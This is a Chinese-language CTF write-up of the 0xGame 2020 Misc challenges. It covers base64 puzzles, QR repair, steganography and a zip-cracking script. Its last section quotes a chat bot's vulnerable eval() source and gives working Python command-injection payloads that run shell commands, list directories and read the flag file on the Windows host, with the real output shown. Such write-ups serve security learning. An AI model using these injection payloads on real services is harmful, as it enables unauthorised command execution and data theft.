…

week1

签到题

查看rules可以得到flag

0xGame{Welc0m_to_0xGame2020}

easyBase

一眼看出base64加密，base16 解密即可

QR_repair

qq截图两张不全的二维码，用美图秀秀拼在一起，百度找一张二维码角的图片贴上去，再用微信扫码即可

lowerBase64

每四个字符一组穷举改大小写解出
官方wp：
Base64会把原文的3个字节为一组，一共是24bits，6bits一组重组为4个新的字符。所以我们爆破时需
要以4个一组，枚举所有字母大小写的组合，然后进行解码。
exp:

from base64 import b64decode from itertools import product 
c = 'mhhnyw1lezviodq1ntkxltmwmditngjlny1hzgi5lwu4m2q1ntcymtblnx0=' 
table = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-{}' 

flag = b"" 
real_data = ""
 for i in range(0, len(c), 4):
     pos = [] 
     for char in c[i:i+4]: 
         pos.append([char.lower(), char.upper()]) 
     cases = ["".join(k) for k in product(*pos)]
     for case in cases:
          if all(chr(char) in table for char in b64decode(case)):
               real_data += case
               flag += b64decode(case) 
               break 
print(real_data) 
print(flag.decode())

pcap

wireshark打开 搜索HTTP POST发现有文件上传，类型为zip，导出HTTP对象为zip，解压得到图片改宽高
一个小非预期：binwalk可以直接分离出zip文件

week2

Differentpic

stegsolve打开image compare模式发现二维码 保存二维码打开更改滤镜扫码得到flag

Extract

Binwalk解压得到二维码，扫码提示stegpy，搜索stegpy，发现使用方法，使用stegpy对图片解密得到flag

week3

threeThousand

编写脚本

import os
import shutil
import zipfile
import random
from os.path import join, getsize

fileIndex = 3000

while(fileIndex != 1):
    fileName = "%d.zip" % fileIndex
    print("begining extract: " + fileName)
    f = zipfile.ZipFile(fileName, 'r')
    for i in range(0, 100):
        try:
            f.extractall(pwd = ('%02d' % i).encode("utf-8"), path = r"./")
            print("pwd = %02d" % i)
            break
        except:
            pass

    f.close()
    os.remove(r"./%s" % fileName)
    fileIndex = fileIndex - 1

easyMisc

按F12发现两行

<!--ZWFzeU1pc2MvZmxhZy56aXA=-->

<!--ZWFzeU1pc2MvcmVjb3JkLndhdg==-->

都是base64加密，解密后的结果粘贴补充到地址栏可以得到压缩包和wav，猫猫hint的图用stegpy解密得知从wav里获取压缩包密码(并没有什么意义的hint)，au打开,是DTMF 得到压缩包密码,解压图片使用stegpy解开得flag

week4

flip

解压文件夹后au打开pwd.mp3写出摩斯电码，解密，按照题目说法把密码顺序调转打开压缩包，得到txt文件将里面的二进制数逐一逆序后放入JDK，二进制转ascii得到第二个密码，压缩包里隐藏了一张图片需要在kali里binwalk出来，图片已加密，刚好输入第二个密码得到flag图片，扫描二维码可得flag

Hex酱

不会python 不会做，唯一一个没出来的misc题
官方wp：
其实是一道web题
源码：

import random 
import base64 
import hashlib 
wrong_msg = ["我可运行不了这种呀","不支持这么写啦", "看不懂这种呀", "哎呀，没有运行成功~"] 
def keyword_filter(keyword, msg): 
    for i in keyword: 
        if i not in msg: 
            return False return True 
def py_filter(msg): 
    for keyword in ["class", "eval", "exec","input","listdir", "help","powershell", "cmd", "shutdown", "del", "logoff", "sys", "globals", "builtins", "getattr", "pow"]: 
        if keyword_filter(keyword, msg): 
            return [False, keyword] 
    if "**" in msg: 
            return [False,"**"] 
    return [True] 
def do_python(msg): 
    try:
        msg = msg[6:-1] 
        print(msg) 
        key_word = py_filter(msg) 
        if key_word[0]: 
            temp = eval(msg) 
            else:return "包含关键词："+key_word[1] 
            if temp != None: 
                return str(temp) 
            else:
                return random.choice(wrong_msg) 
        except: 
            return random.choice(wrong_msg) 
def rcode(msg): 
    if msg[:6] == "print(" and msg[-1] == ")": 
        return [True, do_python(msg)] 
    if (msg[:4] == "md5(" or msg[:4] == "MD5(") and msg[-1] == ")": 
        return [True, hashlib.md5(msg[4:-1].encode()).hexdigest()] 
    if (msg[:7] == "sha256(" or msg[:7] == "SHA256(") and msg[-1] == ")":
         return [True, hashlib.sha256(msg[7:-1].encode()).hexdigest()]
    if (msg[:7] == "sha512(" or msg[:7] == "SHA512(") and msg[-1] == ")": 
        return [True, hashlib.sha512(msg[7:-1].encode()).hexdigest()]
    if msg[:10] == "b64encode(" and msg[-1] == ")":
         return [True, base64.b64encode(msg[10:-1].encode()).decode()] 
    if msg[:10] == "b64decode(" and msg[-1] == ")":
        return [True, base64.b64decode(msg[10:-1]).decode()] 
return [None]

就是调用eval执行python代码，绕过黑名单过滤进行一个python命令注入就可以拿到flag
黑名单是只要出现了某个关键词中的所有字符就会过滤
其实过滤没起什么作用，看起来过滤了很多，但是 import os 没过滤
windows下对大小写不敏感，全大写就行，所以拿flag的姿势非常多
二进制编码也行
最简单的使用os库执行系统命令：

print(__import__('os').popen('WHOAMI').read())
izozp2s3d5jnzaz\administrator

列当前目录文件：

print(__import__('os').popen('DIR').read()) 
2020/11/03 15:52 <DIR> . 
2020/11/03 15:52 <DIR> .. 
2020/08/11 11:39 <DIR> app 
2020/08/11 11:39 <DIR> conf 
2020/08/11 11:39 <DIR> data 
2020/09/24 16:23 <DIR> go-cqhttp 
2020/08/11 11:39 <DIR> httpapi 
2020/09/22 20:38 1,312 main_bot.py 
2020/09/18 01:20 1,813 massage_filter.py 
2020/11/03 15:52 1,850 runcode.py 
2020/09/18 01:20 <DIR> __pycache__

查看当前路径：

print(__import__('os').popen('CD').read()) 
C:\Users\Administrator\Desktop\Game\HexQBot

查看上一级目录：

print(__import__('os').popen('DIR ..\\').read()) 
2020/09/30 00:33 <DIR> . 
2020/09/30 00:33 <DIR> .. 
2020/10/27 00:13 <DIR> HexQBot 
2020/09/30 00:33 9,440,520 HexQBot.zip 
2020/09/30 00:33 <DIR> __MACOSX

查看桌面文件：

#有时候qq会因为消息长度限制导致无回显，dir命令加个/b就好了 #一般windows题，flag经常在桌面上 
print(__import__('os').popen('DIR /B ..\\..\\').read())
或者
print(__import__('os').popen('DIR /B %USERPROFILE%\\DESKTOP').read()) 
或者
print(__import__('os').popen('DIR /B C:\\USERS\\ADMINISTRATOR\\DESKTOP').read()) 
BtSoft.exe
Game 
go-cqhttp-v0.9.17-windows-amd64.zip 
Google Chrome.lnk 
here_is_flag.txt 
HexQBot 
HexQBot - 副本 
HexQBot - 副本.zip 
jdk-14.0.2_windows-x64_bin.exe 
Mirai整合包Dice+铃心564 
Mirai整合包Dice+铃心564.zip 
pycryptodome-3.9.8-cp36-cp36m-win_amd64.whl 
python-3.7.6-amd64.exe 
task 
Visual Studio Code.lnk yafu-1.34 
yafu-1.34.zip 
宝塔面板.lnk

在桌面看到flag文件： here_is_flag.txt
查看flag：

print(__import__('os').popen('TYPE %USERPROFILE%\\DESKTOP\\HERE_IS_FLAG.TXT').read()) 或者使用通配符?： 
print(__import__('os').popen('TYPE %USERPROFILE%\\DESKTOP\\????_?? _????.???').read()) 
或者*： 
print(__import__('os').popen('TYPE %USERPROFILE%\\DESKTOP\\HER*').read()) 
#0xGame{621a9c2d-0f24-40fc-b5e2-8d8018e5165b}

下次出windows题可能把flag放在内网服务了，搞一个域渗透？